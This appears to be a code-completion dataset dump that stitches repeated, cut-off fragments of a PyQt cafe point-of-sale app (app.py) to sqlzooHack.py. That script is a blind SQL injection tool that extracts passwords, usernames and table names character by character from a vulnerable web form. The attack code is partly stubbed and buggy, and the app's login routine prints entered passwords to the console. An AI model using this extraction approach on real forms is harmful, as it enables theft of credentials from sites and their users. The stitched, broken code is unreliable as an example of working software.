with open("backup/"+timestr+'.json', 'w') as backupFile:
json.dump(self.itemDataBase,backupFile)
def loadBackupFunction(self):
try:
filename = QFileDialog.getOpenFileName()
path = filename[0]
with open(path, "r") as f:
|
random_line_split
|
|
app.py
|
.noteBtn.setEnabled(False)
self.addItemBtn = QtWidgets.QPushButton(self.itemBox)
self.addItemBtn.setGeometry(QtCore.QRect(290, 50, 75, 23))
self.addItemBtn.setObjectName("addItemBtn")
self.addItemBtn.clicked.connect(self.addItemFunction)
self.tableList = [i for i in range(21)]
self.tableDrop = QtWidgets.QComboBox(self.itemBox)
self.tableDrop.setGeometry(QtCore.QRect(200, 20, 69, 22))
self.tableDrop.setObjectName("tableDrop")
for table in self.tableList:
self.tableDrop.addItem(str(table))
self.itemDataBase[str(table)] = ["Table Number "+str(table)]
self.tableDrop.activated.connect(self.loadTableItem)
self.tableNoLbl = QtWidgets.QLabel(self.itemBox)
self.tableNoLbl.setGeometry(QtCore.QRect(120, 10, 131, 41))
self.tableNoLbl.setObjectName("tableNoLbl")
self.addTable = QtWidgets.QPushButton(self.itemBox)
self.addTable.setGeometry(QtCore.QRect(10, 20, 75, 23))
self.addTable.setObjectName("AddTable")
self.addTable.clicked.connect(self.addTableFunction)
self.addTable.setEnabled(False)
self.showItem = QtWidgets.QTextEdit(self.itemBox)
self.showItem.setGeometry(QtCore.QRect(10, 50, 261, 231))
self.showItem.setObjectName("showItem")
self.showItem.setReadOnly(True)
self.orderButton = QtWidgets.QPushButton(self.itemBox)
self.orderButton.setGeometry(QtCore.QRect(290, 110, 75, 23))
self.orderButton.setObjectName("orderButton")
self.orderButton.clicked.connect(self.orderFunction)
self.orderButton.setEnabled(False)
self.loadBackupFile = QtWidgets.QPushButton(self.itemBox)
self.loadBackupFile.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loadBackupFile.setObjectName("loadBackupFile")
self.loadBackupFile.clicked.connect(self.loadBackupFunction)
self.loadBackupFile.setEnabled(False)
self.loginBox = QtWidgets.QGroupBox(Dialog)
self.loginBox.setGeometry(QtCore.QRect(10, 10, 381, 81))
self.loginBox.setObjectName("loginBox")
self.userLbl = QtWidgets.QLabel(self.loginBox)
self.userLbl.setGeometry(QtCore.QRect(10, 20, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.userLbl.setFont(font)
self.userLbl.setObjectName("userLbl")
self.inputUser = QtWidgets.QLineEdit(self.loginBox)
self.inputUser.setGeometry(QtCore.QRect(70, 20, 201, 21))
self.inputUser.setObjectName("inputUser")
self.loginBtn = QtWidgets.QPushButton(self.loginBox)
self.loginBtn.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loginBtn.setObjectName("loginBtn")
self.loginBtn.clicked.connect(self.loginFunction)
self.inputPwd = QtWidgets.QLineEdit(self.loginBox)
self.inputPwd.setGeometry(QtCore.QRect(70, 50, 201, 21))
self.inputPwd.setObjectName("inputPwd")
self.inputPwd.setEchoMode(QtWidgets.QLineEdit.Password)
self.passLbl = QtWidgets.QLabel(self.loginBox)
self.passLbl.setGeometry(QtCore.QRect(10, 50, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.passLbl.setFont(font)
self.passLbl.setObjectName("passLbl")
self.msgWrong = QMessageBox()
self.msgWrong.setWindowTitle("Login Check")
self.msgWrong.setText("Wrong user/password!")
self.msgWrong.setIcon(QMessageBox.Critical)
self.msgCorrect = QMessageBox()
self.msgCorrect.setWindowTitle("Login Check")
self.msgCorrect.setText(" Login Successful!")
self.msgCorrect.setIcon(QMessageBox.Information)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
self.removeOldBackupFile()
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.itemBox.setTitle(_translate("Dialog", "GroupBox"))
self.checkOutBtn.setText(_translate("Dialog", "Check out"))
self.noteBtn.setText(_translate("Dialog", "Note"))
self.addItemBtn.setText(_translate("Dialog", "Add Items"))
self.tableDrop.setItemText(0, _translate("Dialog", "1"))
self.tableDrop.setItemText(1, _translate("Dialog", "2"))
self.tableDrop.setItemText(2, _translate("Dialog", "3"))
self.tableNoLbl.setText(_translate("Dialog", "Table Number"))
self.showItem.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.addTable.setText(_translate("Dialog", "Add Table"))
self.loginBox.setTitle(_translate("Dialog", "GroupBox"))
self.userLbl.setText(_translate("Dialog", "User:"))
self.loginBtn.setText(_translate("Dialog", "Login"))
self.passLbl.setText(_translate("Dialog", "Pass:"))
self.orderButton.setText(_translate("Dialog", "Order"))
self.loadBackupFile.setText(_translate("Dialog", "Load Backup"))
def addItemFunction(self):
self.addItemWindow = Ui_MainWindow()
self.itemWindow = QtWidgets.QMainWindow()
self.addItemWindow.setupUi(self.itemWindow)
self.itemWindow.setWindowIcon(QtGui.QIcon('sushi.jpg'))
self.buttonBox = QtWidgets.QDialogButtonBox(self.addItemWindow.centralwidget)
self.buttonBox.setGeometry(QtCore.QRect(620, 560, 251, 41))
font = QtGui.QFont()
font.setPointSize(12)
self.buttonBox.setFont(font)
self.buttonBox.setToolTipDuration(4)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.accepted.connect(self.okButtonClick)
self.buttonBox.rejected.connect(self.cancelButtonClick)
self.buttonBox.setObjectName("buttonBox")
self.itemWindow.show()
def okButtonClick(self):
for item in self.addItemWindow.spinBoxList:
if(str(item.value())!= "0"):
printOut = str(item.value())+" x "+item.objectName()
self.itemDataBase[self.tableDrop.currentText()].append(printOut)
#self.showItem.append(printOut)
self.itemWindow.close()
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item.split(".")[0])
self.writeBackupFile()
def cancelButtonClick(self):
self.itemWindow.close()
def addTableFunction(self):
currentKeyNumber = len(self.itemDataBase.keys())
self.tableDrop.addItem(str(currentKeyNumber))
self.itemDataBase[str(currentKeyNumber)] = ["Table Number "+str(currentKeyNumber)]
def loadTableItem(self):
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item)
def loginFunction(self):
try:
user = self.inputUser.text()
print("user : " + user)
pwd = self.inputPwd.text()
print("pwd : " + pwd)
except:
print("Missing Input!")
self.msgWrong.exec_()
pass
try:
if(self.loginDatabase[user] == pwd):
print("Login Successful!")
self.msgCorrect.exec_()
self.adminRight = True
self.loadBackupFile.setEnabled(True)
self.addTable.setEnabled(True)
else:
self.msgWrong.exec_()
except:
print("Wrong password! ")
self.msgWrong.exec_()
def writeBackupFile(self):
timestr = time.strftime("%Y%m%d-%H%M%S")
with open("backup/"+timestr+'.json', 'w') as backupFile:
json.dump(self.itemDataBase,backupFile)
def loadBackupFunction(self):
try:
filename = QFileDialog.getOpenFileName()
path = filename[0]
with open(path, "r") as f:
self.itemDataBase.clear()
self.itemDataBase = json.load(f)
self.loadTableItem()
except:
print("Can't Open Backup Folder!")
pass
def removeOldBackupFile(self):
currentMonthStr = time.strftime("%m")
folder = os.fsencode("backup")
try:
for file in os.listdir(folder):
|
filename = os.fsdecode(file)
if filename.endswith('.json') and filename[4:6] != currentMonthStr:
os.remove("backup/"+filename)
|
conditional_block
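# Aside (not in app.py): writeBackupFile above dumps the JSON backup straight to its
# final name, so a crash mid-dump can leave a truncated file.  A common variant, shown
# as a sketch under the same timestamped naming scheme, writes to a temporary file and
# renames it atomically.  The helper name writeBackupFileAtomic is hypothetical.
import json
import os
import time
def writeBackupFileAtomic(itemDataBase, folder="backup"):
    os.makedirs(folder, exist_ok=True)
    timestr = time.strftime("%Y%m%d-%H%M%S")
    final_path = os.path.join(folder, timestr + ".json")
    tmp_path = final_path + ".tmp"
    with open(tmp_path, "w") as backupFile:
        json.dump(itemDataBase, backupFile)
    os.replace(tmp_path, final_path)   # atomic rename on the same filesystem
    return final_path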
|
|
app.py
|
self.userLbl.setText(_translate("Dialog", "User:"))
self.loginBtn.setText(_translate("Dialog", "Login"))
self.passLbl.setText(_translate("Dialog", "Pass:"))
self.orderButton.setText(_translate("Dialog", "Order"))
self.loadBackupFile.setText(_translate("Dialog", "Load Backup"))
def addItemFunction(self):
self.addItemWindow = Ui_MainWindow()
self.itemWindow = QtWidgets.QMainWindow()
self.addItemWindow.setupUi(self.itemWindow)
self.itemWindow.setWindowIcon(QtGui.QIcon('sushi.jpg'))
self.buttonBox = QtWidgets.QDialogButtonBox(self.addItemWindow.centralwidget)
self.buttonBox.setGeometry(QtCore.QRect(620, 560, 251, 41))
font = QtGui.QFont()
font.setPointSize(12)
self.buttonBox.setFont(font)
self.buttonBox.setToolTipDuration(4)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.accepted.connect(self.okButtonClick)
self.buttonBox.rejected.connect(self.cancelButtonClick)
self.buttonBox.setObjectName("buttonBox")
self.itemWindow.show()
def okButtonClick(self):
for item in self.addItemWindow.spinBoxList:
if(str(item.value())!= "0"):
printOut = str(item.value())+" x "+item.objectName()
self.itemDataBase[self.tableDrop.currentText()].append(printOut)
#self.showItem.append(printOut)
self.itemWindow.close()
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item.split(".")[0])
self.writeBackupFile()
def cancelButtonClick(self):
self.itemWindow.close()
def addTableFunction(self):
currentKeyNumber = len(self.itemDataBase.keys())
self.tableDrop.addItem(str(currentKeyNumber))
self.itemDataBase[str(currentKeyNumber)] = ["Table Number "+str(currentKeyNumber)]
def loadTableItem(self):
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item)
def loginFunction(self):
try:
user = self.inputUser.text()
print("user : " + user)
pwd = self.inputPwd.text()
print("pwd : " + pwd)
except:
print("Missing Input!")
self.msgWrong.exec_()
pass
try:
if(self.loginDatabase[user] == pwd):
print("Login Successful!")
self.msgCorrect.exec_()
self.adminRight = True
self.loadBackupFile.setEnabled(True)
self.addTable.setEnabled(True)
else:
self.msgWrong.exec_()
except:
print("Wrong password! ")
self.msgWrong.exec_()
def writeBackupFile(self):
timestr = time.strftime("%Y%m%d-%H%M%S")
with open("backup/"+timestr+'.json', 'w') as backupFile:
json.dump(self.itemDataBase,backupFile)
def loadBackupFunction(self):
try:
filename = QFileDialog.getOpenFileName()
path = filename[0]
with open(path, "r") as f:
self.itemDataBase.clear()
self.itemDataBase = json.load(f)
self.loadTableItem()
except:
print("Can't Open Backup Folder!")
pass
def removeOldBackupFile(self):
currentMonthStr = time.strftime("%m")
folder = os.fsencode("backup")
try:
for file in os.listdir(folder):
filename = os.fsdecode(file)
if filename.endswith('.json') and filename[4:6] != currentMonthStr:
os.remove("backup/"+filename)
except:
print("Missing Backup Folder !")
print("Creating Backup Folder ...")
os.mkdir("backup")
def showNotAuthorize(self):
notAdmin = QMessageBox()
notAdmin.setWindowTitle("Login Check")
notAdmin.setText("Not Authorized! Please Login!")
notAdmin.setIcon(QMessageBox.Critical)
notAdmin.exec_()
def checkOutFunction(self):
stringToPrint = self.getPriceFromItem()
print(stringToPrint)
self.showItem.clear()
self.itemDataBase[self.tableDrop.currentText()].clear()
self.itemDataBase[self.tableDrop.currentText()] = ["Table Number "+ self.tableDrop.currentText()]
self.showItem.append("Table Number "+ self.tableDrop.currentText())
self.callPrinterToPrint(stringToPrint)
def getPriceFromItem(self):
temp = self.itemDataBase[self.tableDrop.currentText()].pop(0)
totalPrice = 0
tempDateTime = time.strftime("%d-%m-%Y %H:%M Id: ")
tempBillId = time.strftime("%m%d%H%M%S")
tempString = """An nhiên Cafe by Bảo Châu
Address: 09 Phạm Thái Bường (Liên Xã) Thị xã Hoà Thành, TP. Tây Ninh\n\n"""+tempDateTime +tempBillId+ "\n\n"
tempString+= "Bill of Table " + self.tableDrop.currentText() + "\n\n"
for item in self.itemDataBase[self.tableDrop.currentText()]:
quantity = item.split(" x ")[0]
name = item.split(" x ")[1].split(".")[0]
priceOfOne = priceList[name]
priceActual = priceOfOne*int(quantity)
totalPrice += priceActual
##print(item.split(".")[0] + " = " + str(price))
tempString += item.split(".")[0] + " = %s vnd\n" % ("{:,.0f}".format(int(priceActual)))
tempString += """============================
\t\tTotal: {:>1,.0f} vnd""".format(int(totalPrice))
return tempString
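# Small illustrative sketch (not part of app.py): getPriceFromItem stores each order
# line as "<qty> x <name>" and formats prices with "{:,.0f}".  The helper below shows
# just that parsing/formatting step in isolation; price_list stands in for the
# module-level priceList dict the app reads from.
def format_bill_line(item, price_list):
    quantity, rest = item.split(" x ", 1)
    name = rest.split(".")[0]
    price_actual = price_list[name] * int(quantity)
    return price_actual, "%s = %s vnd" % (item.split(".")[0], "{:,.0f}".format(price_actual))
# Example:
# total, line = format_bill_line("2 x Coffee", {"Coffee": 25000})
# -> line == "2 x Coffee = 50,000 vnd"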
def callPrinterToPrint(self,stringToPrint):
document = docx.Document()
margin = 5
sections = document.sections
for section in sections:
section.page_height = Mm(210)
section.page_width = Mm(72)
section.top_margin = Mm(margin)
section.bottom_margin = Mm(margin)
section.left_margin = Mm(margin)
section.right_margin = Mm(margin)
document.add_paragraph(stringToPrint)
document.save("testdoc.docx")
try:
print("Start printing...")
os.startfile("testdoc.docx", "print")
time.sleep(1)
os.startfile("testdoc.docx", "print")
time.sleep(1)
print("Done!")
except Exception as e:
print(str(e))
print("--Failed to print--")
time.sleep(2)
def orderFunction(self):
stringToPrint = self.getPriceFromItem()
print(stringToPrint)
self.callPrinterToPrint(stringToPrint)
# def callPrinterToPrint(self,stringToPrint):
# filename = "test.txt"
# name = win32print.GetDefaultPrinter()
# printdefaults = {"DesiredAccess": win32print.PRINTER_ALL_ACCESS}
# handle = win32print.OpenPrinter(name, printdefaults)
# level = 2
# # retrieve default settings. this code does not work on
# attributes = win32print.GetPrinter(handle ,level)
# attributes["pDevMode"].PaperSize = 0
# attributes["pDevMode"].PaperLength = 21
# attributes["pDevMode"].PaperWidth = 7.21
# attributes["pDevMode"].Position_x = 1
# attributes["pDevMode"].Position_y = 1
# attributes["pDevMode"].PelsWidth = 1
# attributes["pDevMode"].PelsHeight = 1
# attributes["pDevMode"].DisplayFixedOutput = DisplayFixedOutput =2
# try:
# win32print.SetPrinter(handle, level, attributes, 0)
# except:
# print("win32print.SetPrinter: settings could not be changed")
# try:
# with codecs.getwriter('utf_8') (open (filename, "wb")) as file:
# file.write(stringToPrint)
# Print2Copies = win32api.ShellExecute(0, 'print', filename, None, '.', 0)
# time.sleep(1)
# Print2Copies
# # hdc = win32gui.CreateDC('', printer_name, attributes)
# # win32print.StartDoc(hdc, ('Test', "test.txt", None, 0))
# # win32print.StartPage(hdc)
# # win32print.EndPage(hdc)
# # win32print.EndDoc(hdc)
# print("Printing now...")
# win32print.ClosePrinter(handle)
# print("Done")
# except Exception as e:
# print(str(e))
# print("--Failed to print--")
# time.sleep(5)
# def closeEvent(self, event):
# close = QtWidgets.QMessageBox.question(self,
# "QUIT",
# "Are you sure want to stop process?",
# QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
# if close == QtWidgets.QMessageBox.Yes:
# event.accept()
# else:
# event.ignore()
def main():
app =
|
QApp
|
identifier_name
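# Hedged completion sketch: the dump cuts main() off right after "app =", with the
# masked identifier starting "QApp".  A typical PyQt5 entry point consistent with the
# rest of app.py (a Dialog driven by setupUi/retranslateUi) would look roughly like
# this; the class name Ui_Dialog and the __main__ guard are assumptions, not original
# code, and the real continuation is not shown in the dump.
import sys
from PyQt5 import QtWidgets   # app.py already imports the Qt modules it uses
def main_sketch():
    app = QtWidgets.QApplication(sys.argv)
    dialog = QtWidgets.QDialog()
    ui = Ui_Dialog()            # assumed name of the class owning setupUi()
    ui.setupUi(dialog)
    dialog.show()
    sys.exit(app.exec_())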
|
|
app.py
|
self.checkOutBtn = QtWidgets.QPushButton(self.itemBox)
self.checkOutBtn.setGeometry(QtCore.QRect(290, 140, 75, 23))
self.checkOutBtn.setObjectName("checkOutBtn")
self.checkOutBtn.clicked.connect(self.checkOutFunction)
self.noteBtn = QtWidgets.QPushButton(self.itemBox)
self.noteBtn.setGeometry(QtCore.QRect(290, 80, 75, 23))
self.noteBtn.setObjectName("noteBtn")
self.noteBtn.setEnabled(False)
self.addItemBtn = QtWidgets.QPushButton(self.itemBox)
self.addItemBtn.setGeometry(QtCore.QRect(290, 50, 75, 23))
self.addItemBtn.setObjectName("addItemBtn")
self.addItemBtn.clicked.connect(self.addItemFunction)
self.tableList = [i for i in range(21)]
self.tableDrop = QtWidgets.QComboBox(self.itemBox)
self.tableDrop.setGeometry(QtCore.QRect(200, 20, 69, 22))
self.tableDrop.setObjectName("tableDrop")
for table in self.tableList:
self.tableDrop.addItem(str(table))
self.itemDataBase[str(table)] = ["Table Number "+str(table)]
self.tableDrop.activated.connect(self.loadTableItem)
self.tableNoLbl = QtWidgets.QLabel(self.itemBox)
self.tableNoLbl.setGeometry(QtCore.QRect(120, 10, 131, 41))
self.tableNoLbl.setObjectName("tableNoLbl")
self.addTable = QtWidgets.QPushButton(self.itemBox)
self.addTable.setGeometry(QtCore.QRect(10, 20, 75, 23))
self.addTable.setObjectName("AddTable")
self.addTable.clicked.connect(self.addTableFunction)
self.addTable.setEnabled(False)
self.showItem = QtWidgets.QTextEdit(self.itemBox)
self.showItem.setGeometry(QtCore.QRect(10, 50, 261, 231))
self.showItem.setObjectName("showItem")
self.showItem.setReadOnly(True)
self.orderButton = QtWidgets.QPushButton(self.itemBox)
self.orderButton.setGeometry(QtCore.QRect(290, 110, 75, 23))
self.orderButton.setObjectName("orderButton")
self.orderButton.clicked.connect(self.orderFunction)
self.orderButton.setEnabled(False)
self.loadBackupFile = QtWidgets.QPushButton(self.itemBox)
self.loadBackupFile.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loadBackupFile.setObjectName("loadBackupFile")
self.loadBackupFile.clicked.connect(self.loadBackupFunction)
self.loadBackupFile.setEnabled(False)
self.loginBox = QtWidgets.QGroupBox(Dialog)
self.loginBox.setGeometry(QtCore.QRect(10, 10, 381, 81))
self.loginBox.setObjectName("loginBox")
self.userLbl = QtWidgets.QLabel(self.loginBox)
self.userLbl.setGeometry(QtCore.QRect(10, 20, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.userLbl.setFont(font)
self.userLbl.setObjectName("userLbl")
self.inputUser = QtWidgets.QLineEdit(self.loginBox)
self.inputUser.setGeometry(QtCore.QRect(70, 20, 201, 21))
self.inputUser.setObjectName("inputUser")
self.loginBtn = QtWidgets.QPushButton(self.loginBox)
self.loginBtn.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loginBtn.setObjectName("loginBtn")
self.loginBtn.clicked.connect(self.loginFunction)
self.inputPwd = QtWidgets.QLineEdit(self.loginBox)
self.inputPwd.setGeometry(QtCore.QRect(70, 50, 201, 21))
self.inputPwd.setObjectName("inputPwd")
self.inputPwd.setEchoMode(QtWidgets.QLineEdit.Password)
self.passLbl = QtWidgets.QLabel(self.loginBox)
self.passLbl.setGeometry(QtCore.QRect(10, 50, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.passLbl.setFont(font)
self.passLbl.setObjectName("passLbl")
self.msgWrong = QMessageBox()
self.msgWrong.setWindowTitle("Login Check")
self.msgWrong.setText("Wrong user/password!")
self.msgWrong.setIcon(QMessageBox.Critical)
self.msgCorrect = QMessageBox()
self.msgCorrect.setWindowTitle("Login Check")
self.msgCorrect.setText(" Login Successful!")
self.msgCorrect.setIcon(QMessageBox.Information)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
self.removeOldBackupFile()
def retranslateUi(self, Dialog):
|
self.orderButton.setText(_translate("Dialog", "Order"))
self.loadBackupFile.setText(_translate("Dialog", "Load Backup"))
def addItemFunction(self):
self.addItemWindow = Ui_MainWindow()
self.itemWindow = QtWidgets.QMainWindow()
self.addItemWindow.setupUi(self.itemWindow)
self.itemWindow.setWindowIcon(QtGui.QIcon('sushi.jpg'))
self.buttonBox = QtWidgets.QDialogButtonBox(self.addItemWindow.centralwidget)
self.buttonBox.setGeometry(QtCore.QRect(620, 560, 251, 41))
font = QtGui.QFont()
font.setPointSize(12)
self.buttonBox.setFont(font)
self.buttonBox.setToolTipDuration(4)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.accepted.connect(self.okButtonClick)
self.buttonBox.rejected.connect(self.cancelButtonClick)
self.buttonBox.setObjectName("buttonBox")
self.itemWindow.show()
def okButtonClick(self):
for item in self.addItemWindow.spinBoxList:
if(str(item.value())!= "0"):
printOut = str(item.value())+" x "+item.objectName()
self.itemDataBase[self.tableDrop.currentText()].append(printOut)
#self.showItem.append(printOut)
self.itemWindow.close()
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item.split(".")[0])
self.writeBackupFile()
def cancelButtonClick(self):
self.itemWindow.close()
def addTableFunction(self):
currentKeyNumber = len(self.itemDataBase.keys())
self.tableDrop.addItem(str(currentKeyNumber))
self.itemDataBase[str(currentKeyNumber)] = ["Table Number "+str(currentKeyNumber)]
def loadTableItem(self):
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item)
def loginFunction(self):
try:
user = self.inputUser.text()
print("user : " + user)
pwd = self.inputPwd.text()
print("pwd : " + pwd)
except:
print("Missing Input!")
self.msgWrong.exec_()
pass
try:
if(self.loginDatabase[user] == pwd):
print("Login Successful!")
self.msgCorrect.exec_()
self.adminRight = True
self.loadBackupFile.setEnabled(True)
self.addTable.setEnabled(True)
else:
self.msgWrong.exec_()
except:
print("Wrong password! ")
self.msgWrong.exec_()
def writeBackupFile(self):
timestr = time.strftime("%Y%m%d-%H%M%S")
with open("backup/"+timestr+'.json', 'w') as backupFile:
json.dump(self.itemDataBase,backupFile)
def loadBackupFunction(self):
try:
filename = QFileDialog.getOpenFileName()
path = filename[0]
with open(path, "r") as f:
self
|
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.itemBox.setTitle(_translate("Dialog", "GroupBox"))
self.checkOutBtn.setText(_translate("Dialog", "Check out"))
self.noteBtn.setText(_translate("Dialog", "Note"))
self.addItemBtn.setText(_translate("Dialog", "Add Items"))
self.tableDrop.setItemText(0, _translate("Dialog", "1"))
self.tableDrop.setItemText(1, _translate("Dialog", "2"))
self.tableDrop.setItemText(2, _translate("Dialog", "3"))
self.tableNoLbl.setText(_translate("Dialog", "Table Number"))
self.showItem.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.addTable.setText(_translate("Dialog", "Add Table"))
self.loginBox.setTitle(_translate("Dialog", "GroupBox"))
self.userLbl.setText(_translate("Dialog", "User:"))
self.loginBtn.setText(_translate("Dialog", "Login"))
self.passLbl.setText(_translate("Dialog", "Pass:"))
|
identifier_body
|
sqlzooHack.py
|
the charList (wildCards is True), _ will be substituted in since it matches every single character.
otherwise, if no characters match, that character will be skipped, and its index is printed (e.g. Missing: 6)
Raises:
TypeError: exception
raised with ValueErrors when findChar returns i instead of an element of CharList
ValueError: exception
raised when no character in charList is correct.
https://stackoverflow.com/questions/2052390/manually-raising-throwing-an-exception-in-python
Note: not working as hoped. Perhaps I need to change the other functions to always return a str? Maybe a place holder string like _ for now?
"""
# dikt = {}
password = ""
for i in range(0, n):
if(testPassword(password, username, url)):
return password #password is found!
# https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python
ch = findChar(username, url, charList, i)
# if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string
# use try except instead of if(isinstance(ch, int)):
# https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not
try:
password += ch
except TypeError:
# print(i)
password += str(ch) #should be blank
# raise ValueError("index i has no matching character")
return password #only reached if password is too long for the given n
def findChar(username, url, charList, i):
"""helper function for checkPass
returns the first element of charList found that works for the password at index i
if it fails to find a character at i, prints i and returns an empty string instead of returning i.
"""
for ch in charList:
if(checkPasswordCharacter(ch, username, url, index = i)):
return ch
#only runs if no ch in charList match:
# return i #oof, there's no match if i is out of bounds, e.g. len(password) < i
print("Missing: " + i) #so I know when it's not a match
return "" #return an empty string instead
# Note to self: should not return an _ because it'll match an _ if wildCards are true (default).
# If wildCards is false, this will just skip characters that don't match anything!
"""
Strategy:
if findChar returns i - meaning checkPass will print i then raise a type and a value error -
then perhaps check all unicode characters for the password at index i and add the one that works to the characters checked and rerun the script
"""
def makeTableList(url, caseSensitive = False, wildCards = True):
|
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(wildCards):
for ch in wildcards: # iterate the wildcard characters; wildCards is only the on/off flag
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
return charList
def makeDatabaseList(url, caseSensitive = False, wildCards = True):
""" List of characters in database names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sensitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in database names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(wildCards):
for ch in wildcards: # iterate the wildcard characters; wildCards is only the on/off flag
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
return charList
def makeTableNamesList(n, ):
""" List of table names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n table names
"""
def tableName(lst, ):
name = ""
for i in range(0, n):
for ch in lst:
if(characterInTableName(ch, url, i)):
name += ch
else:
name += "" #should only be reached if wildcards are false
return name
def makeDatabaseNamesList(n, ):
""" List of database names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n database names
"""
def makeListF(f, url, *argsf, caseSensitive = False, wildCards = True):
"""makeList generalized to use the boolean function f.
Args:
argsf: list
sole list argument of the function f.
Returns:
lst: list of valid characters as determined by the boolean function f
"""
def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True):
""" returns list of characters that appear in any username
"""
"""
sqlzoo characters
['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%']
"""
lst = []
for ch in special:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in lower:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in numbers:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in other:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(caseSensitive):
for ch in upper:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(wildCards):
for ch in wildcards:
lst.append(ch) #it'll match if there's users
return lst
def userLists(n, tableName, url, characterList):
"""
Assumption: usernames are unique.
Args:
n: integer
max password length
tableName: string
name of table with usernames
url: string
url of vulnerable form
characterList:
list of characters in one or more usernames
Returns:
lstNested: list of lists
returns a list of up to n lists, each sublist i contains characters
from characterList that match at least one username at index i in the
username strings
(e.g. lst = [[a], [b,c], [d]] could correspond to a, ab, ac, abd, acd)
Raises:
"""
lstNested = []
for i in range(0, n):
lst = []
for ch in characterList:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = i)):
lst.append(ch)
if(len(lst) == 0 or lst[0] == "%"):
break
lstNested.append(lst)
return lstNested
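# Illustrative follow-up (not in the original script): the nested per-index lists
# returned by userLists can be expanded into full-length username candidates with
# itertools.product.  For the docstring's [[a], [b, c], [d]] this yields abd and acd;
# the shorter prefixes a, ab, ac would need truncation on top of this.
import itertools
def expandCandidates(lstNested, drop_wildcards=("_", "%")):
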